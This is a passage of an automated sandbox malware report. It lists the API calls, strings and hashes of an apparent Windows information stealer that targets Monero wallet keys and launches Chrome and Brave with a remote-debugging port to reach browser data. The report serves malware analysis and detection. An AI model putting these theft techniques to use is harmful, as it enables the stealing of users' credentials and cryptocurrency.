                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 4e18b4cb956a5926c4f63c4e29e7a5f71ae47b90bb7224535b4496cfa3ad18a0
                                        • Instruction ID: 653e8f949cb391f12667c017401a7aa09b5fa31bdc3cd2ece4f8eadad2c5f004
                                        • Opcode Fuzzy Hash: 4e18b4cb956a5926c4f63c4e29e7a5f71ae47b90bb7224535b4496cfa3ad18a0
                                        • Instruction Fuzzy Hash: 80111231900108ABDB18FFA4DD92BED7379AF90340F408559F91A57692EF38AB09CB91
                                        Function 00987A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 4868bfb46de1d841fc1533d1c0ddd5d0e0d206693ff49947dd7e0ba32c2cdc6f
                                        • Instruction ID: dadeda4b4c8cc35b565b9074de7253965051377a02556bed9155087ecb4cd234
                                        • Opcode Fuzzy Hash: 4868bfb46de1d841fc1533d1c0ddd5d0e0d206693ff49947dd7e0ba32c2cdc6f
                                        • Instruction Fuzzy Hash: 06016DB1A08249EBCB14DF98DD45BAEBBB8FB45711F20061AF505E2780D7B45A408BA1
                                        Function 00971110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
                                        • ExitProcess.KERNEL32 ref: 00971143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 512f0dbdfe34cef711013f0e86e70f8224c9b56ef6dfe81da1799daccd1a61ec
                                        • Instruction ID: deab217093abcb173149599f62321605fcc482676668ad188630629f6e159cb4
                                        • Opcode Fuzzy Hash: 512f0dbdfe34cef711013f0e86e70f8224c9b56ef6dfe81da1799daccd1a61ec
                                        • Instruction Fuzzy Hash: C8E08674A49308FBE7205BA0DC0AB0C766CAB05B01F104144F70C7A1D0C7F425404698
                                        Function 009710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009710B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009710F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 5f49491513ab0f9fed753096634580c36a48041695fbd634374b0ed5cdbe398e
                                        • Instruction ID: bb06aa9bf6f262d2ddc239c9f2975ab53f01fa5bc3a49f98808344c602a4d06f
                                        • Opcode Fuzzy Hash: 5f49491513ab0f9fed753096634580c36a48041695fbd634374b0ed5cdbe398e
                                        • Instruction Fuzzy Hash: 67F082B6641218BBE7149AB8AC59FAFB79CF705B05F304948F504E7280D6719E009BA4
                                        Function 00971190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00987A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                          • Part of subcall function 00987A70: RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                          • Part of subcall function 00987A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                          • Part of subcall function 009879E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                          • Part of subcall function 009879E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                          • Part of subcall function 009879E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                        • ExitProcess.KERNEL32 ref: 009711C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 709bdbeac3e8f636f1bcaf971d54bd19e08551ea441bdef728aa32596f2ad7d7
                                        • Instruction ID: 103e1bb5dac9f8e2fb88e9521b6287440edd3d38c8931439f1a5d6a068906531
                                        • Opcode Fuzzy Hash: 709bdbeac3e8f636f1bcaf971d54bd19e08551ea441bdef728aa32596f2ad7d7
                                        • Instruction Fuzzy Hash: 03E017AAA1830163DA1077F8BC4BB2F328C6B9634AF500814FA0986202EE26E8048375

                                        Non-executed Functions

                                        Function 0097BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00990B32,00990B2F,00000000,?,?,?,00991450,00990B2E), ref: 0097BEC5
                                        • StrCmpCA.SHLWAPI(?,00991454), ref: 0097BF33
                                        • StrCmpCA.SHLWAPI(?,00991458), ref: 0097BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 0097C8BB
                                        Strings
                                        • Brave, xrefs: 0097C0E8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C534
                                        • Google Chrome, xrefs: 0097C6F8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C495
                                        • \Brave\Preferences, xrefs: 0097C1C1
                                        • Preferences, xrefs: 0097C104
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 2453cf1e276d567c28377f9714fdd085b54feabbba653bc6f38902a31b4b41cc
                                        • Instruction ID: 5ab4dbd74337c1f2eb814feb781d97dba38079b27dfd9c4dc72a058af9e0acf4
                                        • Opcode Fuzzy Hash: 2453cf1e276d567c28377f9714fdd085b54feabbba653bc6f38902a31b4b41cc
                                        • Instruction Fuzzy Hash: BF52FF729101089BDB14FB64DD96FEE737DBF94300F404599B50AA6191EF38AB48CFA2
                                        Function 00983B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00983B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00983B33
                                        • lstrcat.KERNEL32(?,?), ref: 00983B85
                                        • StrCmpCA.SHLWAPI(?,00990F58), ref: 00983B97
                                        • StrCmpCA.SHLWAPI(?,00990F5C), ref: 00983BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00983EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00983ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 03f032782ab2bc5e705e72ba1ec604713c6f8881aa1aec9529500e75c4d84dbd
                                        • Instruction ID: 5a4127a57ad26363be54a08700d2f1e1afb9f0dafad0c9ac94407d3262bc6a60
                                        • Opcode Fuzzy Hash: 03f032782ab2bc5e705e72ba1ec604713c6f8881aa1aec9529500e75c4d84dbd
                                        • Instruction Fuzzy Hash: 98A122B6A002189BDB34EFA4DC85FEE737DBB95700F448588B50D96181EB749B88CF61
                                        Function 00984B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00984B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                        • StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                        • StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 75679468e96aecc5c3cce016a40ec98ebf53cad8df310a93252737a5c3ec94d5
                                        • Instruction ID: 6549e5d71618de2463123687e083abc701ecb09af7594beec2f350970fb2d754
                                        • Opcode Fuzzy Hash: 75679468e96aecc5c3cce016a40ec98ebf53cad8df310a93252737a5c3ec94d5
                                        • Instruction Fuzzy Hash: 88613676900219ABCF24EBA4DD45FEE737CBF89700F008698B60D96150EB75AB84CF91
                                        Function 009847C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009847D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009847D7
                                        • wsprintfA.USER32 ref: 009847F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0098480D
                                        • StrCmpCA.SHLWAPI(?,00990FAC), ref: 0098483B
                                        • StrCmpCA.SHLWAPI(?,00990FB0), ref: 00984851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009848DB
                                        • FindClose.KERNEL32(000000FF), ref: 009848F0
                                        • lstrcat.KERNEL32(?,0181FC40), ref: 00984915
                                        • lstrcat.KERNEL32(?,0181E148), ref: 00984928
                                        • lstrlen.KERNEL32(?), ref: 00984935
                                        • lstrlen.KERNEL32(?), ref: 00984946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 7cb42ebcb3e3b2fea79a496cb94ad08b75d25545dac50c57c6cec21b4ae824e3
                                        • Instruction ID: ea83ee9a668450e1e87055aab9b65361eee5dcfcf8816e7b7e0e40044d8be52c
                                        • Opcode Fuzzy Hash: 7cb42ebcb3e3b2fea79a496cb94ad08b75d25545dac50c57c6cec21b4ae824e3
                                        • Instruction Fuzzy Hash: 035144B55442189BCB24EB74DC89FEE737CBB99700F404688B60D96150EB749B88CF91
                                        Function 009840F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00984113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0098412A
                                        • StrCmpCA.SHLWAPI(?,00990F94), ref: 00984158
                                        • StrCmpCA.SHLWAPI(?,00990F98), ref: 0098416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009842BC
                                        • FindClose.KERNEL32(000000FF), ref: 009842D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
